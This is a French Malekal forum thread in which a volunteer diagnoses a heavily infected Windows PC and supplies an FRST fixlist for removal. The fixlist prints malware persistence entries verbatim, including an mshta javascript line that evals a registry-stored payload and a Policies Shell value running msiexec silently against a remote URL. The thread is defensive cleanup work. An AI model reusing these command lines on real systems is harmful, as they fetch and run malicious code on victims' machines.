Plusieurs "conhost.exe" et "TRACERT.EXE"

Hard Level · par **Hard Level** » 18 sept. 2017 18:10

Bonjour,

J'ai un un gros problème avec deux processus qui bouffent tout mon UC, c'est le "conhost.exe" et le "TRACERT.EXE" qui se multiplient (+ de *60).

Multiple.JPG

Merci de votre aide.

par **Malekal_morte** » 18 sept. 2017 19:02

Bonsoir,

Commence par ceci :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
* FRST.txt
* Shortcut.
* Additionnal.txt

Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

Hard Level · par **Hard Level** » 22 oct. 2017 12:39

Bonjour,

Désolé pour l'attente, j'espère que que tu pourras quand même m'aider.

Voici les rapports :
* Addition: https://pjjoint.malekal.com/files.php?i ... 5r5r6i6r11
* FRST: https://pjjoint.malekal.com/files.php?i ... 11t6p6e8h8
* Shortcut: https://pjjoint.malekal.com/files.php?i ... 1x11u9s8h9

Merci beaucoup de ton aide.

par **Malekal_morte** » 22 oct. 2017 12:52

Cet ordinateur est complètement infecté, adwares, trojans etc.
Depuis ~Avril 2017.

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2079818094-243757647-2503990435-1000\Software\Classes\80d4b: "C:\Windows\system32\mshta.exe" "javascript:AnoWP8="FV";g6a=new ActiveXObject("WScript.Shell");E1yH7smwv="k";aY0km=g6a.RegRead("HKCU\\software\\zfjifwkzzf\\avoucozea");cLh98a="viUkiwHz";eval(aY0km);ZAcuag9V="6Ib5Av";"
Task: {2A539694-EE84-414A-8CB3-4DDB27977D08} - System32\Tasks\{1D958C8E-E412-46BD-A86A-644B535FF0A6} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\1LQKU6C1IW\uninstaller.exe" -d "C:\Program Files\1LQKU6C1IW"
Task: {2F0D6FB2-D339-498B-B9F6-2FCBC1F84BD9} - System32\Tasks\{5B9BDB6B-B51D-4D25-9390-C33D23C79FF8} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\IKKOJ2G3QY\uninstaller.exe" -d "C:\Program Files\IKKOJ2G3QY"
Task: {3471B02A-04EE-49C0-A223-F77EB7C5E8C6} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {491E6489-46BC-4E17-983F-9465094CBB54} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
Task: {4DB18DB9-EA0D-44B8-848C-9F5F98E9E7B0} - System32\Tasks\{E01166A1-0E70-47B3-877B-C2507C4A340A} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\FG4TT4Q25F\uninstaller.exe" -d "C:\Program Files\FG4TT4Q25F"
Task: {69283BF5-C995-474D-B750-B36F1A07DC4F} - System32\Tasks\{AE2B9C95-A1C4-492C-9DDC-134DAF98C3AF} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\IKKOJ2G3QY\uninstaller.exe" -d "C:\Program Files\IKKOJ2G3QY"
Task: {9C358CD8-3C12-48AA-B336-FFFB6DE8AF51} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {AFA0983F-AB68-419D-A4D6-AA7FB748124C} - System32\Tasks\{164060FC-51C9-4B0F-824E-92D4CFE2A7D2} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\PGUJL084LH\uninstaller.exe" -d "C:\Program Files\PGUJL084LH"
Task: {BD6ED0A4-AA6D-4594-944F-F7025918B39D} - System32\Tasks\{060F5A2F-FC58-471B-87FE-B94CB4B0FF47} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\SOAXQPMZLU\uninstaller.exe" -d "C:\Program Files\SOAXQPMZLU"
Task: {CD32CE55-CD53-4B6D-923D-372A31CF637C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-04-08] (Piriform Ltd)
Task: {D0D02FDB-378E-4C1B-973D-4D2A8F69D4DB} - System32\Tasks\3c91fcc2-ce59-42b3-b901-f68079520898 => C:\Users\pc\AppData\Local\Temp\ce98ac2e-20c0-4a93-86f6-bdb3e61caf55.exe <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <==== ATTENTION
Shortcut: C:\Users\pc\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.htm
Shortcut: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files\Bookness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\PersonneÂ 2 - Chrome.lnk -> C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856 ()
ShortcutWithArgument: C:\Users\pc\Desktop\reparer ordi\Sеаrсh.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493140795&z=b970a8f61dac1c58856ccaagcz1t7cbg7zaeamat9z&from=che0812&uid=FUJITSUXMHZ2160BHXG2_K62KT982E4VET982E4VEX
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493140795&z=b970a8f61dac1c58856ccaagcz1t7cbg7zaeamat9z&from=che0812&uid=FUJITSUXMHZ2160BHXG2_K62KT982E4VET982E4VEX
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://www.bigbangempire.com/?ref=281-000-000-005}";
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493140795&z=b970a8f61dac1c58856ccaagcz1t7cbg7zaeamat9z&from=che0812&uid=FUJITSUXMHZ2160BHXG2_K62KT982E4VET982E4VEX
ShortcutWithArgument: C:\Users\Public\Desktop\Моzillа Firеfох.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493140795&z=b970a8f61dac1c58856ccaagcz1t7cbg7zaeamat9z&from=che0812&uid=FUJITSUXMHZ2160BHXG2_K62KT982E4VET982E4VEX
HKLM\...\Run: [MerciJacquieMichel] => wscript.exe //B C:\Users\pc\AppData\Local\Temp\MerciJacquieMichel.vbe <==== ATTENTION 
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES/MALWAREBYTES/ANTI-MALWARE\mbamtray.exe [2786768 2016-11-29] (Malwarebytes) 
 HKLM\...\Winlogon: [Userinit] c:\windows\system32\userinit.exe,userinit.exe,c:\program files\microsoft\desktoplayersrv.exe,c:\program files\microsoft\desktoplayersrvsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\bootstrapsrvsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\ismagentsrv.exe,c:\program files\image-line\fl studio 11\flsrvsrv.exe,c:\programdata\servicesrv.exe,c:\program files\jidd\karxmhfonkisrv.exe,c:\program files\microsoft\desktoplayer.exe,c:\users\pc\desktop\frstsrv.exe,c:\program files\covotainpregoly\kisughtsrv.exe,,c:\program files\baghair\application\chromesrv.exe,c:\programdata\wintools\wintoolsrv.exe,c:\users\pc\appdata\local\rdahhtgo\ajrtrwpc.exe,c:\program files\intel\intel(r) rapid storage technology\iastordatamgrsvcsrv.exe,c:\users\pc\desktop\frstsrvsrv.exe,c:\users\pc\appdata\local\rdahhtgo\ajrtrwpcsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\bootstrapsrv.exe,c:\program files\microsoft\desktoplayersrvsrvsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\bootstrapsrvsrvsrv.exe,c:\program files\image-line\fl studio 12\flsrv.exe,c:\program files\image-line\fl studio 11\flsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\updateuisrv.exe,c:\program files\image-line\fl studio 11\flsrvsrvsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\updateuisrvsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\updateuisrvsrvsrv.exe,c:\users\pc\appdata\local\temp\jfjyygvisrv.exe,c:\users\pc\appdata\roaming\microsoft\windows\start menu\programs\startup\ajrtrwpcsrv.exe,c:\program files\intel\intel(r) rapid storage technology\iastordatamgrsvcsrvsrv.exe,c:\users\pc\appdata\local\rdahhtgo\ajrtrwpcsrvsrv.exe,c:\program files\intel\intel(r) me fw recovery agent\bin\updateuisrvsrvsrvsrv.exe,c:\users\pc\appdata\roaming\microsoft\windows\start menu\programs\startup\ajrtrwpcsrvsrv.exe,c:\program files\image-line\fl studio 12\flsrvsrv.exe,c:\users\pc\appdata\local\rdahhtgo\ajrtrwpcsrvsrvsrv.exe  
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [MerciJacquieMichel] => wscript.exe //B C:\Users\pc\AppData\Local\Temp\MerciJacquieMichel.vbe <==== ATTENTION 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [2e7a6119] => C:\Users\pc\AppData\Roaming\Microsoft\Crypto\sysras.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [*iofcqb<*>] => C:\Users\pc\AppData\Local\88086\b83e9.bat <==== ATTENTION (Nom de valeur avec caractères invalides)  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [6NKMWFJDBL] => C:\Users\pc\AppData\Local\Temp\D8O1Y0LK16\caster.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [03L9MATXM4] => C:\Program Files\DPower\G0IMJKJREO.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [7TIN7C329P] => C:\Program Files\DPower\8QOWA3BSN8.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [UH71V806FX] => C:\Program Files\BestCleaner\2WY2H6WAQA.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [ZB75OTL5U5] => C:\Program Files\PGUJL084LH\PGUJL084L.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [IEFN2OV6IB] => C:\Program Files\1LQKU6C1IW\1LQKU6C1I.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [R20LQ6PKHM] => C:\Program Files\3QGRN7ZIC5\3QGRN7ZIC.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [RUKQTX7H1S] => C:\Program Files\45C4UP574X\45C4UP574.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [UGQ1HL5JEX] => C:\Program Files\M2R4ITCIGD\M2R4ITCIG.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [AC1HZI0CPU] => C:\Users\pc\AppData\Local\Temp\SXREY7QIL\SXREY7QIL.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [FE49JOOINM] => C:\Users\pc\AppData\Local\Temp\6NE45V82H\6NE45V82H.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [N05X3NV4MK] => C:\Users\pc\AppData\Local\Temp\55YGX0DT5\55YGX0DT5.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [LNLZWV3DXW] => C:\Users\pc\AppData\Local\Temp\GGKWY8R3E\GGKWY8R3E.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [9S3HJPIF6K] => C:\Program Files\LXWPG69479\LXWPG6947.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [7JAIQZ1IDX] => C:\Users\pc\AppData\Local\Temp\KL75DZUZJ\KL75DZUZJ.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [J85J5IYMO0] => C:\Users\pc\AppData\Local\Temp\46EFCZHIB\YLWM43715.exe <==== ATTENTION  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [YANNTDEJNO] => C:\Program Files\FG4TT4Q25F\FG4TT4Q25.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [7Y7LHU9XMZ] => C:\Program Files\J6QCAJBD2K\DK8J1N1WX.exe 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [background_fault] => C:\Users\pc\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <==== ATTENTION  
HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Run: [AjrTrwpc] => :\users\pc\appdata\local\rdahhtgo\ajrtrwpc.ex 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8yFTQQNkNXRjk3N8M1NkM4FkIxMTU5OYE4RUM3NdhYRF== /q <==== ATTENTION [Pays US - 104.28.17.238] 
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\MountPoints2: F - F:\HTC_Sync_Manager_PC.exe  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\MountPoints2: {a4c88479-0796-11e6-9910-20689d39f73b} - F:\HTC_Sync_Manager_PC.exe  
 HKU\S-1-5-21-2079818094-243757647-2503990435-1000\...\MountPoints2: {e90c9814-0669-11e6-b2c8-20689d39f73b} - G:\setup.exe  
 HKLM\...\Providers\os9m9brr: C:\Program Files\Courkaripack Center\local32spl.dll [273408 2016-12-27] () <==== ATTENTION 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe 
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe 
IFEO\taskmgr.exe: [Debugger] 
reg: reg delete "HKCU\software\zfjifwkzzf"
 ShellExecuteHooks: Pas de nom - {C378E1F4-C6B5-11E6-A004-64006A5CFC23} - C:\Users\pc\AppData\Roaming\Reorch\Dromertion.dll -> Pas de fichier <==== ATTENTION 
 Startup: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ajrtrwpc.exe [2017-05-24] ()  
 Startup: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ajrtrwpcSrv.exe [2017-10-21] (SOFTWIN S.R.L.)  
 Startup: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ajrtrwpcsrvSrv.exe [2017-10-03] (SOFTWIN S.R.L.)  
 Startup: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MerciJacquieMichel.vbe [2014-10-16] ()  
R2 3DM; C:\Users\pc\AppData\Local\3DM\Kitty.dll [754688 2017-04-19] (kitty.exe) [Fichier non signé] <==== ATTENTION 
 R2 Anerbege; C:\Program Files\Covotainpregoly\shequseBuilder.dll [180736 2016-12-27] () [Fichier non signé] 
 R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: <公司名>) [Fichier non signé] <==== ATTENTION  
R2 CSHMDR; C:\Users\pc\AppData\Local\CSHMDR\Snare.dll [658432 2017-05-22] (IntertSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION 
  R2 glory; C:\Users\pc\AppData\Local\glory\glory.dll [689152 2017-06-02] (glory) [Fichier non signé] <==== ATTENTION 
R2 Kitty; C:\Users\pc\AppData\Local\Kitty\Kitty.dll [553472 2017-04-27] (kitty) [Fichier non signé] <==== ATTENTION 
 R2 MS_CHECK_SVC; C:\ProgramData\Microsoft\DeviceSync\LocalBackup.dll [487424 2017-02-08] () [Fichier non signé] <==== ATTENTION 
U2 wiasvc; C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp:ad [212994 ] () [Fichier non signé] <==== ATTENTION <==== ATTENTION 
 S2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Fichier non signé] <==== ATTENTION 
 R2 WinSAPSvc; C:\Users\pc\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [Fichier non signé] <==== ATTENTION 
 C:\Users\pc\AppData\Roaming\WinSAPSvc
C:\ProgramData\Microsoft\Windows\Image
 C:\Users\pc\AppData\Local\Kitty
 C:\Users\pc\AppData\Local\glory
C:\Users\pc\AppData\Local\CSHMDR
C:\ProgramData\BIT
 C:\Users\pc\AppData\Local\3DM
 S2 DohatSU; C:\Users\pc\AppData\Local\Temp\2\amp.exe /i [X] <==== ATTENTION  
 S2 FirefoxDL; C:\Users\pc\AppData\Local\Temp\2\QQBrowser.exe -isvc [X] <==== ATTENTION  
 R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [691832 2017-04-16] () <==== ATTENTION  
2017-10-22 10:31 - 2017-05-25 18:32 - 000222720 ____H C:\Windows\system32\47edvrv6 
 2017-10-22 10:31 - 2017-04-16 09:16 - 000510016 _____ C:\Windows\system32\NetUtils2016.dll  
 2017-10-22 10:31 - 2017-01-31 21:01 - 000056320 _____ (SOFTWIN S.R.L.) C:\Users\pc\Desktop\frstsrvSrv.exe  
 2017-02-13 03:12 - 2017-03-06 18:29 - 000000114 _____ () C:\Program Files\metadata 
 2016-11-23 17:40 - 2016-11-23 17:40 - 000056051 _____ () C:\Program Files\VST PC Read Me.pdf 
 2016-06-29 10:19 - 2016-06-29 16:13 - 000065588 _____ () C:\Users\pc\AppData\Roaming\Camdata.ini  
 2016-06-29 10:19 - 2016-06-29 16:13 - 000000408 _____ () C:\Users\pc\AppData\Roaming\CamLayout.ini  
 2016-06-29 10:19 - 2016-06-29 16:13 - 000000408 _____ () C:\Users\pc\AppData\Roaming\CamShapes.ini  
 2016-06-29 10:19 - 2016-06-29 16:13 - 000004539 _____ () C:\Users\pc\AppData\Roaming\CamStudio.cfg  
 2016-05-10 19:15 - 2017-09-08 14:42 - 000000064 _____ () C:\Users\pc\AppData\Roaming\msregsvv.dll  
 2016-06-29 10:19 - 2016-06-29 11:00 - 000000096 _____ () C:\Users\pc\AppData\Roaming\version2.xml  
 2016-06-29 11:54 - 2016-06-29 11:54 - 000000044 _____ () C:\Users\pc\AppData\Roaming\WB.CFG  
 2016-11-05 11:19 - 2016-11-05 11:19 - 000000480 ____H () C:\Users\pc\AppData\Roaming\½Ó 
 2017-05-25 01:06 - 2017-05-25 01:06 - 000001221 ____H () C:\Users\pc\AppData\Local\b2dd9410ab.log  
 2017-05-25 00:51 - 2017-09-02 19:37 - 000000078 _____ () C:\Users\pc\AppData\Local\bmlyjsqx.log  
 2017-05-25 00:51 - 2017-09-02 19:37 - 000003264 _____ () C:\Users\pc\AppData\Local\digeuser.log  
 2017-05-25 00:50 - 2017-10-17 23:45 - 000000004 _____ () C:\Users\pc\AppData\Local\gptxnabu.log  
 2017-06-17 18:22 - 2017-10-22 10:35 - 040953808 _____ () C:\Users\pc\AppData\Local\oqmkikoa.log  
 2017-05-25 00:50 - 2017-05-25 00:50 - 000000000 _____ () C:\Users\pc\AppData\Local\pjavbxcx.log  
 2017-02-13 03:20 - 2017-02-13 03:20 - 000007607 _____ () C:\Users\pc\AppData\Local\Resmon.ResmonCfg  
 2017-05-25 02:14 - 2017-10-22 01:32 - 015648233 _____ () C:\Users\pc\AppData\Local\rxjpbxpe.log  
 2017-05-25 00:50 - 2017-10-22 10:34 - 000000028 _____ () C:\Users\pc\AppData\Local\tjwwpbve.log  
 2017-05-25 00:50 - 2017-09-02 19:37 - 000563024 _____ () C:\Users\pc\AppData\Local\uaekixab.log  
 2017-05-25 00:50 - 2017-06-17 18:12 - 000032550 _____ () C:\Users\pc\AppData\Local\vwtagfdu.log  
 2017-05-25 00:50 - 2017-05-25 00:50 - 000000000 _____ () C:\Users\pc\AppData\Local\wcoytjgf.log  
 2016-04-20 11:06 - 2017-06-20 03:37 - 000000024 _____ () C:\ProgramData\.BusDriver 
2016-11-05 11:22 - 2016-11-05 11:22 - 000000008 ____H () C:\ProgramData\@000001.dat 
2016-11-05 11:22 - 2016-12-27 00:26 - 000000920 ____H () C:\ProgramData\@system.temp 
2016-11-05 11:19 - 2016-12-27 00:27 - 000000656 ____H () C:\ProgramData\@system3.att 
 2016-05-10 19:15 - 2017-09-08 14:42 - 000000064 _____ () C:\ProgramData\autobk.inc  
 2017-05-25 00:50 - 2017-05-25 00:50 - 000000064 _____ () C:\ProgramData\hkfrnpaf.log  
 2016-12-27 22:44 - 2017-01-26 19:30 - 000114176 _____ (SOFTWIN S.R.L.) C:\ProgramData\servicesrvSrv.exe 
 2017-03-05 19:39 - 2017-07-24 15:35 - 000001061 _____ () C:\ProgramData\SoundToys_Problem_Log.txt  
 C:\Users\pc\AppData\Local\background_fault\aswRD.exe  
C:\ProgramData\@000001.dat 
 C:\ProgramData\servicesrvSrv.exe 
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:

Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

2) réinitialiser les navigateurs:
==================================
Réinitialise tes navigateurs et/ou re-paramètre manuellement tes navigateurs WEB ( page de démarrage, moteur de recherche, etc ) mais aussi supprimer/désactiver les extensions inutiles/parasites.
Pour t'aider à effectuer ce ménage, clique ci-dessous sur le nom du navigateur WEB que tu utilises :
* Réinitialiser et réparer Mozilla Firefox
* Réinitialiser et réparer Google Chrome
* Réinitialiser et réparer Internet Explorer
(Ne pas utiliser Zeok)

3)
Faire un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite

Hard Level · par **Hard Level** » 22 oct. 2017 13:02

Merci de votre réponse.

Petite question, je choisis quel encodage (ANSI, Unicode etc...) pour le "fixlist.txt"?

par **angelique** » 22 oct. 2017 13:58

Peu importe, prends unicode

Malekal.com forum

Plusieurs "conhost.exe" et "TRACERT.EXE"

Plusieurs "conhost.exe" et "TRACERT.EXE"

Re: Plusieurs "conhost.exe" et "TRACERT.EXE"

Re: Plusieurs "conhost.exe" et "TRACERT.EXE"

Re: Plusieurs "conhost.exe" et "TRACERT.EXE"

Re: Plusieurs "conhost.exe" et "TRACERT.EXE"

Re: Plusieurs "conhost.exe" et "TRACERT.EXE"